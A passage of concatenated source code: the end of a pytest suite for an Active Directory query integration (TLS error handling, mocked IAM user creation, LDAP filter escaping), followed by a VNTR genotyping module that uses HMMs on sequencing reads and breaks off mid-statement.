need the first) with a tuple of args list and kwargs info_msg = demisto_info_mock.call_args_list[0][0][0] # ip is not in the certificate. so it should fail on host match assert "doesn't match any name" in info_msg def ssl_bad_socket_server(port): context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) # cert and keyfile generated with # openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem try: context.load_cert_chain('cert.pem', 'key.pem') with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock: sock.bind(('127.0.0.1', port)) sock.listen(5) with context.wrap_socket(sock, server_side=True) as ssock: try: conn, addr = ssock.accept() except ssl.SSLError as err: if 'TLSV1_ALERT_UNKNOWN_CA' in str(err): # all is ok. client refused our cert return raise conn.recv(32) msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n' for x in range(10): msg += msg conn.send(msg) conn.shutdown(socket.SHUT_RDWR) conn.close() except Exception as ex: pytest.fail("Failed starting ssl_bad_socket_server: {}".format(ex)) raise @pytest.mark.filterwarnings("ignore::ResourceWarning") def test_faulty_server(mocker): port = 9638 t = Thread(target=ssl_bad_socket_server, args=(port,)) t.start() time.sleep(1) # wait for socket server to startup params = BASE_TEST_PARAMS.copy() params['server_ip'] = '127.0.0.1' # disable-secrets-detection params['secure_connection'] = 'SSL' params['unsecure'] = True params['port'] = port mocker.patch.object(demisto, 'params', return_value=params) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) # validate our mock of params assert demisto.params().get('secure_connection') == 'SSL' main() t.join(5) assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg def test_ssl_custom_cert(mocker, request): ENV_KEY = 'SSL_CERT_FILE' os.environ[ENV_KEY] = 'cert.pem' def cleanup(): os.environ.pop(ENV_KEY) request.addfinalizer(cleanup) port = 9637 t = Thread(target=ssl_bad_socket_server, args=(port,)) t.start() time.sleep(1) # wait for socket server to startup params = BASE_TEST_PARAMS.copy() params['server_ip'] = '127.0.0.1' # disable-secrets-detection params['secure_connection'] = 'SSL' params['port'] = port mocker.patch.object(demisto, 'params', return_value=params) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) # validate our mock of params assert demisto.params().get('secure_connection') == 'SSL' main() t.join(5) assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg assert 'SSL error' not in err_msg def test_endpoint_entry(): """ Given: Custom attributes to filter the computer object entry. When: The function filters the computer object according to the custom attributes. Then: The function will return all the computer object entry because custom attributes contain '*'. """ from Active_Directory_Query import endpoint_entry custom_attributes_with_asterisk = endpoint_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}, ['*']) assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'Hostname': 'name', 'ID': 'dn', 'Type': 'AD'} def get_outputs_from_user_profile(user_profile): entry_context = user_profile.to_entry() outputs = entry_context.get('Contents') return outputs def test_create_user_iam(mocker): """ Given: A valid user profile with valid mapping When: Running the `create_user_iam` command Then: The user was created successfully in AD. """ import Active_Directory_Query add_args, add_kwargs = [], {} class ConnectionMocker: entries = [] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return def add(self, *args, **kwargs): nonlocal add_args, add_kwargs add_args, add_kwargs = args, kwargs return True Active_Directory_Query.conn = ConnectionMocker() args = {"user-profile": json.dumps({"email": "[email protected]", "username": "test", "locationregion": "Americas"})} mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False) mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': '[email protected]', 'samaccountname': 'test', 'userPrincipalName': 'test', "ou": "OU=Americas,OU=Demisto"}) user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '') outputs = get_outputs_from_user_profile(user_profile) assert outputs.get('action') == IAMActions.CREATE_USER assert outputs.get('success') is True assert outputs.get('active') is False assert outputs.get('email') == '[email protected]' def test_unseccsseful_create_user_iam_missing_ou(mocker): """ Given: A valid user profile with missing ou in the mapping When: Running the `create_user_iam` command Then: - The user was not created in AD. - An error message was returned. """ import Active_Directory_Query add_args, add_kwargs = [], {} class ConnectionMocker: entries = [] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return def add(self, *args, **kwargs): nonlocal add_args, add_kwargs add_args, add_kwargs = args, kwargs return True Active_Directory_Query.conn = ConnectionMocker() args = {"user-profile": json.dumps({"email": "[email protected]", "username": "test", "locationregion": "Americas"})} mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False) mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': '[email protected]', 'samaccountname': 'test', 'userPrincipalName': 'test'}) user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '') outputs = get_outputs_from_user_profile(user_profile) assert outputs.get('action') == IAMActions.CREATE_USER assert outputs.get('success') is False assert outputs.get('email') == '[email protected]' assert 'User must have an Organizational Unit (OU)' in outputs.get('errorMessage') def test_unseccsseful_create_user_iam_missing_samaccountname(mocker): """ Given: A valid user profile with missing samaccountname in the mapping When: Running the `create_user_iam` command Then: - The user was not created in AD. - An error message was returned. """ import Active_Directory_Query add_args, add_kwargs = [], {} class ConnectionMocker: entries = [] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return def add(self, *args, **kwargs): nonlocal add_args, add_kwargs add_args, add_kwargs = args, kwargs return True Active_Directory_Query.conn = ConnectionMocker() args = {"user-profile": json.dumps({"email": "[email protected]", "username": "test", "locationregion": "Americas"})} mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False) mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': '[email protected]', "ou": "OU=Americas,OU=Demisto", 'userPrincipalName': 'test'}) user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '') outputs = get_outputs_from_user_profile(user_profile) assert outputs.get('action') == IAMActions.CREATE_USER assert outputs.get('success') is False assert outputs.get('email') == '[email protected]' assert 'User must have a sAMAccountName' in outputs.get('errorMessage') def test_group_entry_no_custom_attributes(): """ Given: Custom attributes to filter the group object entry. When: The function filters the group object according to the custom attributes. Then: The function will return all the group object entry because custom attributes contain '*'. """ from Active_Directory_Query import group_entry custom_attributes_with_asterisk = group_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}, ['*']) assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD'} def test_group_entry(): """ Given: Custom attributes to filter the group object entry. When: The function filters the group object according to the custom attributes. Then: The function will return all the group object entry because custom attributes contain '*'. """ from Active_Directory_Query import group_entry custom_attributes_with_asterisk = group_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf', 'displayName': 'display name'}, ['displayName']) assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD', 'displayName': 'display name'} def test_search_group_members(mocker): """ sanity test for search_group_members method """ import Active_Directory_Query class EntryMocker: def entry_to_json(self): return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}' class ConnectionMocker: entries = [EntryMocker()] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return expected_results = {'ContentsFormat': 'json', 'Type': 1, 'Contents': [{'dn': 'dn', 'attributes': {'memberOf': ['memberOf'], 'name': ['name']}}], 'ReadableContentsFormat': 'markdown', 'HumanReadable': '### Active Directory - Get Group Members\n|' 'dn|memberOf|name|\n|---|---|---|\n| dn | memberOf | name |\n', 'EntryContext': {'ActiveDirectory.Groups(obj.dn ==dn)': {'dn': 'dn', 'members': [ {'dn': 'dn', 'category': 'group'}]}, 'ActiveDirectory.Groups(obj.dn == val.dn)': [{'dn': 'dn', 'memberOf': ['memberOf'], 'name': ['name']}], 'Group': [{'Type': 'AD', 'ID': 'dn', 'Name': ['name'], 'Groups': ['memberOf']}]}} expected_results = f'demisto results: {json.dumps(expected_results, indent=4, sort_keys=True)}' mocker.patch.object(demisto, 'args', return_value={'member-type': 'group', 'group-dn': 'dn'}) Active_Directory_Query.conn = ConnectionMocker() with patch('logging.Logger.info') as mock: Active_Directory_Query.search_group_members('dc', 1) mock.assert_called_with(expected_results) def test_group_dn_escape_characters(): """ Given: Group name with parentheses When: Running the function group_dn Then: The function search gets the group name after escape special characters. """ import Active_Directory_Query class EntryMocker: def entry_to_json(self): return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}' class ConnectionMocker: entries = [EntryMocker()] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} Active_Directory_Query.conn = ConnectionMocker() with patch('Active_Directory_Query.search', return_value=[EntryMocker()]) as mock: group_dn('group(group)', '') mock.assert_called_with('(&(objectClass=group)(cn=group\\28group\\29))', '')
vntr_finder.py
import logging import numpy import os from multiprocessing import Process, Manager, Value, Semaphore from random import random from uuid import uuid4 import pysam from Bio import pairwise2 from Bio.Seq import Seq from blast_wrapper import get_blast_matched_ids, make_blast_database from coverage_bias import CoverageBiasDetector, CoverageCorrector from hmm_utils import * from pacbio_haplotyper import PacBioHaplotyper from pomegranate import HiddenMarkovModel as Model from profiler import time_usage from sam_utils import get_reference_genome_of_alignment_file from sam_utils import get_related_reads_and_read_count_in_samfile import settings from utils import is_low_quality_read class SelectedRead: def __init__(self, sequence, logp, vpath, mapq=None, reference_start=None): self.sequence = sequence self.logp = logp self.vpath = vpath self.mapq = mapq self.is_mapped = reference_start is not None def is_mapped(self): return self.is_mapped class VNTRFinder: """Find the VNTR structure of a reference VNTR in NGS data of the donor.""" def __init__(self, reference_vntr): self.reference_vntr = reference_vntr self.min_repeat_bp_to_add_read = 2 if len(self.reference_vntr.pattern) < 30: self.min_repeat_bp_to_add_read = 2 self.min_repeat_bp_to_count_repeats = 2 self.minimum_left_flanking_size = {} self.minimum_right_flanking_size = {69212: 19, 532789: 12, 400825: 10, 468671: 10} self.vntr_start = self.reference_vntr.start_point self.vntr_end = self.vntr_start + self.reference_vntr.get_length() @time_usage def build_vntr_matcher_hmm(self, copies, flanking_region_size=100): patterns = self.reference_vntr.get_repeat_segments() left_flanking_region = self.reference_vntr.left_flanking_region[-flanking_region_size:] right_flanking_region = self.reference_vntr.right_flanking_region[:flanking_region_size] vntr_matcher = get_read_matcher_model(left_flanking_region, right_flanking_region, patterns, copies) return vntr_matcher def get_vntr_matcher_hmm(self, read_length): """Try to load trained HMM for this VNTR If there was no trained HMM, it will build one and store it for later usage """ logging.info('Using read length %s' % read_length) copies = int(round(float(read_length) / len(self.reference_vntr.pattern) + 0.5)) base_name = str(self.reference_vntr.id) + '_' + str(read_length) + '.json' stored_hmm_file = settings.TRAINED_HMMS_DIR + base_name if settings.USE_TRAINED_HMMS and os.path.isfile(stored_hmm_file): model = Model() model = model.from_json(stored_hmm_file) return model flanking_region_size = read_length vntr_matcher = self.build_vntr_matcher_hmm(copies, flanking_region_size) json_str = vntr_matcher.to_json() with open(stored_hmm_file, 'w') as outfile: outfile.write(json_str) return vntr_matcher @time_usage def filter_reads_with_keyword_matching(self, working_directory, read_file, short_reads=True): db_name = 'blast_db__' + os.path.basename(read_file) blast_db_name = working_directory + db_name empty_db = False if not os.path.exists(blast_db_name + '.nsq') and not os.path.exists(blast_db_name + '.nal'): empty_db = make_blast_database(read_file, blast_db_name) word_size = int(len(self.reference_vntr.pattern)/3) if word_size > 11: word_size = 11 if word_size < 5: word_size = 5 word_size = str(word_size) search_results = [] blast_ids = set([]) search_id = str(uuid4()) + str(self.reference_vntr.id) queries = self.reference_vntr.get_repeat_segments() if len(self.reference_vntr.pattern) < 10: min_copies = int(10 / len(self.reference_vntr.pattern)) queries = [self.reference_vntr.pattern * min_copies] identity_cutoff = '0' if not short_reads: queries = [self.reference_vntr.left_flanking_region[-80:], self.reference_vntr.right_flanking_region[:80]] word_size = str('10') identity_cutoff = '70' if not empty_db: for query in queries: search_result = get_blast_matched_ids(query, blast_db_name, max_seq='50000', word_size=word_size, evalue=10, search_id=search_id, identity_cutoff=identity_cutoff) search_results.append(search_result) if short_reads: for search_result in search_results: blast_ids |= search_result else: blast_ids = search_results[0] & search_results[1] logging.info('blast selected %s reads for %s' % (len(blast_ids), self.reference_vntr.id)) if len(blast_ids) == len(self.reference_vntr.get_repeat_segments()) * 50 * 1000: logging.error('maximum number of read selected in filtering for pattern %s' % self.reference_vntr.id) return blast_ids @staticmethod def add_hmm_score_to_list(sema, hmm, read, result_scores): logp, vpath = hmm.viterbi(str(read.seq)) rev_logp, rev_vpath = hmm.viterbi(str(Seq(str(read.seq)).reverse_complement())) if logp < rev_logp: logp = rev_logp result_scores.append(logp) sema.release() def is_true_read(self, read): read_start = read.reference_start reference_name = read.reference_name if not reference_name.startswith('chr'): reference_name = 'chr' + reference_name if reference_name == self.reference_vntr.chromosome and self.vntr_start - len(read.seq) < read_start < self.vntr_end: return True return False def find_score_distribution_of_ref(self, samfile, reference, hmm, false_scores, true_scores): process_list = [] sema = Semaphore(settings.CORES) for read in samfile.fetch(reference, multiple_iterators=True): if read.is_unmapped: continue if read.seq.count('N') > 0: continue if self.is_true_read(read): sema.acquire() p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, true_scores)) else: if random() > settings.SCORE_FINDING_READS_FRACTION: continue sema.acquire() p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, false_scores)) process_list.append(p) p.start() for p in process_list: p.join() def save_scores(self, true_scores, false_scores, alignment_file): with open('true_scores_dist_%s_%s' % (self.reference_vntr.id, os.path.basename(alignment_file)), 'w') as out: for score in true_scores: out.write('%.4f\n' % score) with open('false_scores_dist_%s_%s' % (self.reference_vntr.id, os.path.basename(alignment_file)), 'w') as out: for score in false_scores: out.write('%.4f\n' % score) @time_usage def calculate_min_score_to_select_a_read(self, hmm, alignment_file): """Calculate the score distribution of false positive reads and return score to select the 1e-8 percentile of the distribution """ process_list = [] manager = Manager() false_scores = manager.list() true_scores = manager.list() read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) refs = [ref for ref in samfile.references if ref in settings.CHROMOSOMES or 'chr' + ref in settings.CHROMOSOMES] for ref in refs: p = Process(target=self.find_score_distribution_of_ref, args=(samfile, ref, hmm, false_scores, true_scores)) process_list.append(p) p.start() for p in process_list: p.join() if settings.SAVE_SCORE_DISTRIBUTION: self.save_scores(true_scores, false_scores, alignment_file) score = numpy.percentile(false_scores, 100 - settings.SCORE_SELECTION_PERCENTILE) return score def get_min_score_to_select_a_read(self, hmm, alignment_file, read_length): """Try to load the minimum score for this VNTR If the score is not stored, it will compute the score and write it for this VNTR in precomputed data. """ base_name = str(self.reference_vntr.id) + '.scores' stored_scores_file = settings.TRAINED_HMMS_DIR + base_name if settings.USE_TRAINED_HMMS and os.path.isfile(stored_scores_file): with open(stored_scores_file, 'r') as infile: lines = [line.split() for line in infile.readlines() if line.strip() != ''] for stored_length, fraction, score in lines: if int(stored_length) == read_length and settings.SCORE_FINDING_READS_FRACTION == float(fraction): return float(score) elif settings.SCALE_SCORES and settings.SCORE_FINDING_READS_FRACTION == float(fraction): return float(score) * (read_length / int(stored_length)) logging.debug('Minimum score is not precomputed for vntr id: %s' % self.reference_vntr.id) score = self.calculate_min_score_to_select_a_read(hmm, alignment_file) logging.debug('computed score: %s' % score) with open(stored_scores_file, 'a') as outfile: outfile.write('%s %s %s\n' % (read_length, settings.SCORE_FINDING_READS_FRACTION, score)) return score def process_unmapped_read(self, sema, read_segment, hmm, min_score_to_count_read, vntr_bp_in_unmapped_reads, selected_reads, best_seq): if read_segment.seq.count('N') <= 0: sequence = str(read_segment.seq) logp, vpath = hmm.viterbi(sequence) rev_logp, rev_vpath = hmm.viterbi(str(read_segment.seq.reverse_complement())) if logp < rev_logp: sequence = str(read_segment.seq.reverse_complement()) logp = rev_logp vpath = rev_vpath if logp > best_seq['logp']: best_seq['logp'] = logp best_seq['seq'] = sequence best_seq['vpath'] = vpath repeat_bps = get_number_of_repeat_bp_matches_in_vpath(vpath) if logp > min_score_to_count_read: if repeat_bps > self.min_repeat_bp_to_count_repeats: vntr_bp_in_unmapped_reads.value += repeat_bps if repeat_bps > self.min_repeat_bp_to_add_read: selected_reads.append(SelectedRead(sequence, logp, vpath)) sema.release() def find_frameshift_from_selected_reads(self, selected_reads): mutations = {} repeating_bps_in_data = 0 repeats_lengths_distribution = [] for read in selected_reads: visited_states = [state.name for idx, state in read.vpath[1:-1]] repeats_lengths = get_repeating_pattern_lengths(visited_states) repeats_lengths_distribution += repeats_lengths current_repeat = None repeating_bps_in_data += get_number_of_repeat_bp_matches_in_vpath(read.vpath) for i in range(len(visited_states)): if visited_states[i].endswith('fix') or visited_states[i].startswith('M'): continue if visited_states[i].startswith('unit_start'): if current_repeat is None: current_repeat = 0 else: current_repeat += 1 if current_repeat is None or current_repeat >= len(repeats_lengths): continue if not visited_states[i].startswith('I') and not visited_states[i].startswith('D'): continue if repeats_lengths[current_repeat] == len(self.reference_vntr.pattern): continue state = visited_states[i].split('_')[0] if state.startswith('I'): state += get_emitted_basepair_from_visited_states(visited_states[i], visited_states, read.sequence) if abs(repeats_lengths[current_repeat] - len(self.reference_vntr.pattern)) <= 2: if state not in mutations.keys(): mutations[state] = 0 mutations[state] += 1 sorted_mutations = sorted(mutations.items(), key=lambda x: x[1]) logging.debug('sorted mutations: %s ' % sorted_mutations) frameshift_candidate = sorted_mutations[-1] if len(sorted_mutations) else (None, 0) logging.info(sorted(repeats_lengths_distribution)) logging.info('Frameshift Candidate and Occurrence %s: %s' % frameshift_candidate) logging.info('Observed repeating base pairs in data: %s' % repeating_bps_in_data) avg_bp_coverage = float(repeating_bps_in_data) / self.reference_vntr.get_length() logging.info('Average coverage for each base pair: %s' % avg_bp_coverage) if frameshift_candidate[1] > avg_bp_coverage / 4: logging.info('There is a frameshift at %s' % frameshift_candidate[0]) return frameshift_candidate[0] return None def read_flanks_repeats_with_confidence(self, vpath): minimum_left_flanking = 5 minimum_right_flanking = 5 if self.reference_vntr.id in self.minimum_left_flanking_size: minimum_left_flanking = self.minimum_left_flanking_size[self.reference_vntr.id] if self.reference_vntr.id in self.minimum_right_flanking_size: minimum_right_flanking = self.minimum_right_flanking_size[self.reference_vntr.id] if get_left_flanking_region_size_in_vpath(vpath) > minimum_left_flanking: if get_right_flanking_region_size_in_vpath(vpath) > minimum_right_flanking: return True return False def check_if_flanking_regions_align_to_str(self, read_str, length_distribution, spanning_reads): flanking_region_size = 100 left_flanking = self.reference_vntr.left_flanking_region[-flanking_region_size:] right_flanking = self.reference_vntr.right_flanking_region[:flanking_region_size] left_alignments = pairwise2.align.localms(read_str, left_flanking, 1, -1, -1, -1) if len(left_alignments) < 1: return min_left, max_left = 10e9, 0 for aln in left_alignments: if aln[2] < len(left_flanking) * (1 - 0.3): continue min_left = min(min_left, aln[3]) max_left = max(max_left, aln[3]) if max_left - min_left > 30: with open('vntr_complex.txt', 'a') as out: out.write('%s %s\n' % (self.reference_vntr.id, max_left - min_left)) left_align = left_alignments[0] if left_align[2] < len(left_flanking) * (1 - settings.MAX_ERROR_RATE): return right_alignments = pairwise2.align.localms(read_str, right_flanking, 1, -1, -1, -1) if len(right_alignments) < 1: return min_right, max_right = 10e9, 0 for aln in right_alignments: if aln[2] < len(right_flanking) * (1 - 0.3): continue min_right = min(min_right, aln[3]) max_right = max(max_right, aln[3]) if max_right - min_right > 30: with open('vntr_complex.txt', 'a') as out: out.write('%s %s\n' % (self.reference_vntr.id, max_right - min_right)) right_align = right_alignments[0] if right_align[2] < len(right_flanking) * (1 - settings.MAX_ERROR_RATE): return if right_align[3] < left_align[3]: return spanning_reads.append(read_str[left_align[3]:right_align[3]+flanking_region_size].upper()) length_distribution.append(right_align[3] - (left_align[3] + flanking_region_size)) def check_if_pacbio_read_spans_vntr(self, sema, read, length_distribution, spanning_reads): self.check_if_flanking_regions_align_to_str(str(read.seq), length_distribution, spanning_reads) reverse_complement_str = str(Seq(str(read.seq)).reverse_complement()) self.check_if_flanking_regions_align_to_str(reverse_complement_str, length_distribution, spanning_reads) sema.release() def check_if_pacbio_mapped_read_spans_vntr(self, sema, read, length_distribution, spanning_reads): flanking_region_size = 100 region_start = self.reference_vntr.start_point - flanking_region_size region_end = self.reference_vntr.start_point + self.reference_vntr.get_length() if read.get_reference_positions()[0] < region_start and read.get_reference_positions()[-1] > region_end: read_region_start = None read_region_end = None for read_pos, ref_pos in enumerate(read.get_reference_positions()): if ref_pos >= region_start and read_region_start is None: read_region_start = read_pos if ref_pos >= region_end and read_region_end is None: read_region_end = read_pos if read_region_start is not None and read_region_end is not None: result = read.seq[read_region_start:read_region_end+flanking_region_size] if read.is_reverse: result = str(Seq(result).reverse_complement()) spanning_reads.append(result) length_distribution.append(len(result) - flanking_region_size * 2) sema.release() @time_usage def get_spanning_reads_of_unaligned_pacbio_reads(self, unmapped_filtered_reads): sema = Semaphore(settings.CORES) manager = Manager() shared_length_distribution = manager.list() shared_spanning_reads = manager.list() process_list = [] for read in unmapped_filtered_reads: sema.acquire() p = Process(target=self.check_if_pacbio_read_spans_vntr, args=(sema, read, shared_length_distribution, shared_spanning_reads)) process_list.append(p) p.start() for p in process_list: p.join() logging.info('length_distribution of unmapped spanning reads: %s' % list(shared_length_distribution)) return list(shared_spanning_reads), list(shared_length_distribution) @time_usage def get_spanning_reads_of_aligned_pacbio_reads(self, alignment_file): sema = Semaphore(settings.CORES) manager = Manager() length_distribution = manager.list() mapped_spanning_reads = manager.list() vntr_start = self.reference_vntr.start_point vntr_end = self.reference_vntr.start_point + self.reference_vntr.get_length() region_start = vntr_start region_end = vntr_end read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) reference = get_reference_genome_of_alignment_file(samfile) chromosome = self.reference_vntr.chromosome if reference == 'HG19' else self.reference_vntr.chromosome[3:] process_list = [] for read in samfile.fetch(chromosome, region_start, region_end): sema.acquire() p = Process(target=self.check_if_pacbio_read_spans_vntr, args=(sema, read, length_distribution, mapped_spanning_reads)) process_list.append(p) p.start() for p in process_list: p.join() logging.info('length_distribution of mapped spanning reads: %s' % list(length_distribution)) return list(mapped_spanning_reads) def get_conditional_likelihood(self, ck, ci, cj, ru_counts, r, r_e): if ck == ci == cj: return 1-r if cj == 0: # CHECK LATER return 0.5 * (1-r) if ck == ci: return 0.5 * ((1-r) + r_e ** abs(ck-cj)) if ck == cj: return 0.5 * ((1-r) + r_e ** abs(ck-ci)) if ck != ci and ck != cj: return 0.5 * (r_e ** abs(ck-ci) + r_e ** abs(ck-cj)) def find_genotype_based_on_observed_repeats(self, observed_copy_numbers): ru_counts = {} for cn in observed_copy_numbers: if cn not in ru_counts.keys(): ru_counts[cn] = 0 ru_counts[cn] += 1 if len(ru_counts.keys()) < 2: priors = 0.5 ru_counts[0] = 1 else: priors = 1.0 / (len(ru_counts.keys()) * (len(ru_counts.keys())-1) / 2) import operator ru_counts = sorted(ru_counts.items(), key=operator.itemgetter(1), reverse=True) r = 0.03 r_e = r / (2 + r) prs = {} for ck, occ in ru_counts: if ck == 0: continue for i in range(len(ru_counts)): ci = ru_counts[i][0] for j in range(len(ru_counts)): if j < i: continue cj = ru_counts[j][0] if (ci, cj) not in prs.keys(): prs[(ci, cj)] = [] prs[(ci, cj)].append(self.get_conditional_likelihood(ck, ci, cj, ru_counts, r, r_e) ** occ) posteriors = {} import numpy for key in prs.keys(): prs[key] = numpy.prod(numpy.array(prs[key])) posteriors[key] = prs[key] * priors sum_of_probs = sum(posteriors.values()) max_prob = 1e-20 result = None for key, value in posteriors.items(): if value / sum_of_probs > max_prob: max_prob = value / sum_of_probs result = key logging.info('Maximum probability for genotyping: %s' % max_prob) return result def get_dominant_copy_numbers_from_spanning_reads(self, spanning_reads): if len(spanning_reads) < 1: logging.info('There is no spanning read') return None max_length = 0 for read in spanning_reads: if len(read) - 100 > max_length: max_length = len(read) - 100 max_copies = int(round(max_length / float(len(self.reference_vntr.pattern)))) # max_copies = min(max_copies, 2 * len(self.reference_vntr.get_repeat_segments())) vntr_matcher = self.build_vntr_matcher_hmm(max_copies) observed_copy_numbers = [] for haplotype in spanning_reads: logp, vpath = vntr_matcher.viterbi(haplotype) rev_logp, rev_vpath = vntr_matcher.viterbi(str(Seq(haplotype).reverse_complement())) if logp < rev_logp: vpath = rev_vpath observed_copy_numbers.append(get_number_of_repeats_in_vpath(vpath)) logging.info('flanked repeats: %s' % observed_copy_numbers) return self.find_genotype_based_on_observed_repeats(observed_copy_numbers) @time_usage def get_haplotype_copy_numbers_from_spanning_reads(self, spanning_reads): if len(spanning_reads) < 1: logging.info('There is no spanning read') return None max_length = 0 for read in spanning_reads: if len(read) - 100 > max_length: max_length = len(read) - 100 max_copies = int(round(max_length / float(len(self.reference_vntr.pattern)))) max_copies = min(max_copies, 2 * len(self.reference_vntr.get_repeat_segments())) vntr_matcher = self.build_vntr_matcher_hmm(max_copies) haplotyper = PacBioHaplotyper(spanning_reads) haplotypes = haplotyper.get_error_corrected_haplotypes() copy_numbers = [] for haplotype in haplotypes: # print('haplotype: %s' % haplotype) logp, vpath = vntr_matcher.viterbi(haplotype) rev_logp, rev_vpath = vntr_matcher.viterbi(str(Seq(haplotype).reverse_complement())) if logp < rev_logp: vpath = rev_vpath copy_numbers.append(get_number_of_repeats_in_vpath(vpath)) return copy_numbers @time_usage def find_repeat_count_from_pacbio_alignment_file(self, alignment_file, unmapped_filtered_reads): logging.debug('finding repeat count from pacbio alignment file for %s' % self.reference_vntr.id) unaligned_spanning_reads, length_dist = self.get_spanning_reads_of_unaligned_pacbio_reads(unmapped_filtered_reads) mapped_spanning_reads = self.get_spanning_reads_of_aligned_pacbio_reads(alignment_file) spanning_reads = mapped_spanning_reads + unaligned_spanning_reads copy_numbers = self.get_dominant_copy_numbers_from_spanning_reads(spanning_reads) return copy_numbers @time_usage def find_repeat_count_from_pacbio_reads(self, unmapped_filtered_reads, naive=False): logging.debug('finding repeat count from pacbio reads file for %s' % self.reference_vntr.id) spanning_reads, length_dist = self.get_spanning_reads_of_unaligned_pacbio_reads(unmapped_filtered_reads) if naive: if len(length_dist): average_length = sum(length_dist) / float(len(length_dist)) copy_numbers = [round(average_length / len(self.reference_vntr.pattern))] * 2 else: copy_numbers = None else: copy_numbers = self.get_dominant_copy_numbers_from_spanning_reads(spanning_reads) return copy_numbers @time_usage def select_illumina_reads(self, alignment_file, unmapped_filtered_reads): hmm = None min_score_to_count_read = None sema = Semaphore(settings.CORES) manager = Manager() selected_reads = manager.list() vntr_bp_in_unmapped_reads = Value('d', 0.0) number_of_reads = 0 read_length = 150 process_list = [] best_seq = manager.dict() best_seq['logp'] = -10e8 best_seq['vpath'] = '' best_seq['seq'] = '' for read_segment in unmapped_filtered_reads: if number_of_reads == 0: read_length = len(str(read_segment.seq)) number_of_reads += 1 if not hmm: hmm = self.get_vntr_matcher_hmm(read_length=read_length) min_score_to_count_read = self.get_min_score_to_select_a_read(hmm, alignment_file, read_length) if len(read_segment.seq) < read_length: continue sema.acquire() p = Process(target=self.process_unmapped_read, args=(sema, read_segment, hmm, min_score_to_count_read, vntr_bp_in_unmapped_reads, selected_reads, best_seq)) process_list.append(p) p.start() for p in process_list: p.join() logging.debug('vntr base pairs in unmapped reads: %s' % vntr_bp_in_unmapped_reads.value) logging.debug('highest logp in unmapped reads: %s' % best_seq['logp']) logging.debug('best sequence %s' % best_seq['seq']) logging.debug('best vpath: %s' % [state.name for idx, state in list(best_seq['vpath'])[1:-1]]) vntr_bp_in_mapped_reads = 0 vntr_start = self.reference_vntr.start_point vntr_end = self.reference_vntr.start_point + self.reference_vntr.get_length() read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) reference = get_reference_genome_of_alignment_file(samfile) chromosome = self.reference_vntr.chromosome if reference == 'HG19' else self.reference_vntr.chromosome[3:] for read in samfile.fetch(chromosome, vntr_start, vntr_end): if not hmm: read_length = len(read.seq) hmm = self.get_vntr_matcher_hmm(read_length=read_length) min_score_to_count_read = self.get_min_score_to_select_a_read(hmm, alignment_file, read_length) if read.is_unmapped: continue if len(read.seq) < int(read_length * 0.9): logging.debug('Rejecting read for short length: %s' % read.seq) continue read_end = read.reference_end if read.reference_end else read.reference_start + len(read.seq) if vntr_start - read_length < read.reference_start < vntr_end or vntr_start < read_end < vntr_end: if read.seq.count('N') <= 0: sequence = str(read.seq) logp, vpath = hmm.viterbi(sequence) rev_logp, rev_vpath = hmm.viterbi(str(Seq(read.seq).reverse_complement())) if logp < rev_logp: sequence = str(Seq(read.seq).reverse_complement()) logp = rev_logp vpath = rev_vpath if is_low_quality_read(read) and logp < min_score_to_count_read: logging.debug('Rejected Read: %s' % sequence) continue selected_reads.append(SelectedRead(sequence, logp, vpath, read.mapq, read.reference_start)) end = min(read_end, vntr_end) start = max(read.reference_start, vntr_start) vntr_bp_in_mapped_reads += end - start logging.debug('vntr base pairs in mapped reads: %s' % vntr_bp_in_mapped_reads) return selected_reads @time_usage def find_frameshift_from_alignment_file(self, alignment_file, unmapped_filtered_reads): logging.debug('finding frameshift from alignment file for %s' % self.reference_vntr.id) selected_reads = self.select_illumina_reads(alignment_file, unmapped_filtered_reads) return 